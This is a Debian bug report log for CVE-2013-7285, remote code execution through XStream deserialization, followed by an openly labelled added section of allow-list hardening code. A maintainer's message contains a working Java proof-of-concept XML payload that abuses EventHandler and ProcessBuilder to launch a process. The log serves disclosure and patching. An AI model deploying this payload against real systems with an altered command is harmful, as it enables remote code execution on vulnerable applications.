Debian Bug report logs - #734821
libxstream-java: CVE-2013-7285: remote code execution via deserialization in XStream
Reported by: Salvatore Bonaccorso <carnil@debian.org>
Date: Fri, 10 Jan 2014 02:54:02 UTC
Severity: grave
Tags: security, upstream
Done: Emmanuel Bourg <ebourg@apache.org>
Bug is archived. No further changes may be made.
Report forwarded to debian-bugs-dist@lists.debian.org, carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>: Bug#734821; Package libxstream-java. (Fri, 10 Jan 2014 02:54:06 GMT)
Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>: New Bug report received and forwarded. Copy sent to carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>. (Fri, 10 Jan 2014 02:54:06 GMT)
Message #5 received at submit@bugs.debian.org:
Package: libxstream-java
Severity: grave
Tags: security upstream
Hi,
the following vulnerability was published for libxstream-java.
CVE-2013-7285[0]:
remote code execution via deserialization in XStream
See also [1] for the original report. [3] contains an initial patch
which was committed.
If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
For further information see:
[0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7285
http://security-tracker.debian.org/tracker/CVE-2013-7285
[1] http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html
[2] http://markmail.org/message/kfqoqdfj5fnup5co?q=list:org.codehaus.xstream.dev&page=3
[3] https://fisheye.codehaus.org/changelog/xstream?cs=2210
Please adjust the affected versions in the BTS as needed.
Regards,
Salvatore
Reply sent to Emmanuel Bourg <ebourg@apache.org>: You have taken responsibility. (Wed, 12 Mar 2014 13:36:23 GMT)
Notification sent to Salvatore Bonaccorso <carnil@debian.org>: Bug acknowledged by developer. (Wed, 12 Mar 2014 13:36:23 GMT)
Message #10 received at 734821-close@bugs.debian.org:
Source: libxstream-java
Source-Version: 1.4.7-1
We believe that the bug you reported is fixed in the latest version of
libxstream-java, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 734821@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Emmanuel Bourg <ebourg@apache.org> (supplier of updated libxstream-java package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.8
Date: Wed, 12 Mar 2014 14:06:33 +0100
Source: libxstream-java
Binary: libxstream-java
Architecture: source all
Version: 1.4.7-1
Distribution: unstable
Urgency: low
Maintainer: Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>
Changed-By: Emmanuel Bourg <ebourg@apache.org>
Description:
libxstream-java - Java library to serialize objects to XML and back again
Closes: 734821
Changes:
libxstream-java (1.4.7-1) unstable; urgency=low
.
* New upstream release
- Fixes CVE-2013-7285 (Closes: #734821)
- Added a dependency on libjdom2-java
* Standards-Version updated to 3.9.5 (no changes)
* Use XZ compression for the upstream tarball
* Build depend on debhelper >= 9
* debian/copyright: Updated to the Copyright Format 1.0
Checksums-Sha1:
684b6cc0d8edae45924832e4eedda12c780cb624 2343 libxstream-java_1.4.7-1.dsc
329882aa8cb64b0ec729d840453a27608f59aba1 397328 libxstream-java_1.4.7.orig.tar.xz
243eb22bca15817712111ca2645a867377ef2a8e 5960 libxstream-java_1.4.7-1.debian.tar.xz
a41e3fee90ff5d6361d0538a84ea8afdcf32e33d 583860 libxstream-java_1.4.7-1_all.deb
Checksums-Sha256:
8698da0a6520f6ab54efadad2e98c5d5e51f37faf0506b155208db85304bc3f2 2343 libxstream-java_1.4.7-1.dsc
33aeb2217d2dd3734abcd6cc6f3d3283fed2646e4cbc79102d5237a099738eed 397328 libxstream-java_1.4.7.orig.tar.xz
08c314aa33cb9164620110466cbe106369aedcc1e8718f1551bcce347c63004a 5960 libxstream-java_1.4.7-1.debian.tar.xz
5a191aa57415acd1c5fb2f6af53ea7f751c615abb8bf9b00a9070f58cb19d322 583860 libxstream-java_1.4.7-1_all.deb
Files:
c8d6431cf68e71eda78e67e950e079aa 2343 java optional libxstream-java_1.4.7-1.dsc
09de7d2175bdc6c002aa681e3004d8d6 397328 java optional libxstream-java_1.4.7.orig.tar.xz
3e72fa42334aaed7ec2248a9ffd3ccf1 5960 java optional libxstream-java_1.4.7-1.debian.tar.xz
72573fdd9319ffae8b1d9dafd65e2c02 583860 java optional libxstream-java_1.4.7-1_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
-----END PGP SIGNATURE-----
Information forwarded to debian-bugs-dist@lists.debian.org, Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>: Bug#734821; Package libxstream-java. (Fri, 10 Oct 2014 09:21:14 GMT)
Acknowledgement sent to Sébastien Delafond <seb@debian.org>: Extra info received and forwarded to list. Copy sent to Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>. (Fri, 10 Oct 2014 09:21:14 GMT)
Message #15 received at 734821@bugs.debian.org:
notfixed 734821 1.4.7-1
thanks
This bug was actually never in Debian, since it was introduced in 1.4.5
and closed in 1.4.7.
If anyone is interested in verifying this, the following code can be run
against the JARs present at
http://repo.maven.apache.org/maven2/com/thoughtworks/xstream/xstream/:
import java.io.IOException;
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.xml.DomDriver;

/* Thanks to </pwntester> for the PoC
 * http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/ */
public class XStreamExploit {
    public static void main(String[] args) throws IOException {
        String process = "/usr/bin/xeyes";
        // A sorted-set (TreeSet) orders its elements, so inserting the second element
        // calls compareTo() on the dynamic proxy. The proxy's invocation handler is a
        // java.beans.EventHandler whose target is a ProcessBuilder and whose action is
        // "start", so the comparison launches the configured process.
        String payload = "<sorted-set>" +
            "<string>foo</string>" +
            "<dynamic-proxy>" +
            "<interface>java.lang.Comparable</interface>" +
            "<handler class=\"java.beans.EventHandler\">" +
            "  <target class=\"java.lang.ProcessBuilder\">" +
            "    <command>" +
            "      <string>" + process + "</string>" +
            "    </command>" +
            "  </target>" +
            "  <action>start</action>" +
            "</handler>" +
            "</dynamic-proxy>" +
            "</sorted-set>";
        // Default XStream configuration, no type restrictions: an affected release
        // builds the proxy and the EventHandler while unmarshalling.
        XStream xstream = new XStream(new DomDriver());
        xstream.fromXML(payload);
    }
}
Cheers,
--Seb
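The hardened counterpart to the PoC above, added here as an example; it is not code from this bug log, from XStream or from Debian. It assumes an XStream 1.4.7 or later on the classpath (the release that, as the changelog above records, closed this bug and that introduced the com.thoughtworks.xstream.security type-permission API), and a hypothetical application type Person that stands in for whatever the application really expects on the wire. The payload string is the one from the message above, with the same /usr/bin/xeyes command, so the rejection can be observed against the same input.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.XStreamException;
import com.thoughtworks.xstream.io.xml.DomDriver;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

public class XStreamHardened {

    /** Hypothetical application type: the only object we expect to receive. */
    public static class Person {
        String name;
        int age;
        Person(String name, int age) { this.name = name; this.age = age; }
    }

    /** Builds an XStream instance that refuses every type not on an explicit allow list. */
    static XStream hardenedXStream() {
        XStream xstream = new XStream(new DomDriver());
        // Start from "nothing may be unmarshalled" instead of the permissive default.
        xstream.addPermission(NoTypePermission.NONE);
        // Re-admit what an ordinary document needs: null, primitives and their wrappers.
        xstream.addPermission(NullPermission.NULL);
        xstream.addPermission(PrimitiveTypePermission.PRIMITIVES);
        // Allow String and our own type; nothing else (no collections, no proxies).
        xstream.allowTypes(new Class[] { String.class, Person.class });
        // Belt and braces: name the handler class the PoC abuses as denied outright.
        xstream.denyTypes(new Class[] { java.beans.EventHandler.class });
        xstream.alias("person", Person.class);
        return xstream;
    }

    public static void main(String[] args) {
        XStream safe = hardenedXStream();

        // A document built from the allow-listed type still round-trips.
        String benign = safe.toXML(new Person("alice", 30));
        Person p = (Person) safe.fromXML(benign);
        System.out.println("benign ok: " + p.name + ", " + p.age);

        // The CVE-2013-7285 payload from Seb's message. The root element sorted-set maps
        // to java.util.TreeSet, which is not allowed, so unmarshalling is refused before
        // any dynamic proxy or EventHandler is instantiated.
        String payload = "<sorted-set>"
            + "<string>foo</string>"
            + "<dynamic-proxy>"
            + "<interface>java.lang.Comparable</interface>"
            + "<handler class=\"java.beans.EventHandler\">"
            + "<target class=\"java.lang.ProcessBuilder\">"
            + "<command><string>/usr/bin/xeyes</string></command>"
            + "</target>"
            + "<action>start</action>"
            + "</handler>"
            + "</dynamic-proxy>"
            + "</sorted-set>";
        try {
            safe.fromXML(payload);
            System.out.println("UNEXPECTED: payload was deserialized");
        } catch (XStreamException e) {
            // Expected: a ForbiddenClassException (an XStreamException) naming TreeSet.
            System.out.println("payload rejected: " + e.getClass().getSimpleName()
                + ": " + e.getMessage());
        }
    }
}
```

Two caveats. The allow list is only available from 1.4.7 onwards, so on the releases Seb names as affected there is nothing to configure and upgrading is the fix; the allow list is what keeps a patched XStream safe against the next gadget class rather than just this one. And the permissive default persisted in releases after 1.4.7, so an application that merely upgrades and keeps calling plain `new XStream(...)` on untrusted input has not closed the class of problem, only this instance of it.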
No longer marked as fixed in versions libxstream-java/1.4.7-1. Request was from Sébastien Delafond <seb@debian.org> to control@bugs.debian.org. (Fri, 10 Oct 2014 09:21:22 GMT)
Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sat, 08 Nov 2014 07:26:44 GMT)
Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 16:41:24 2019.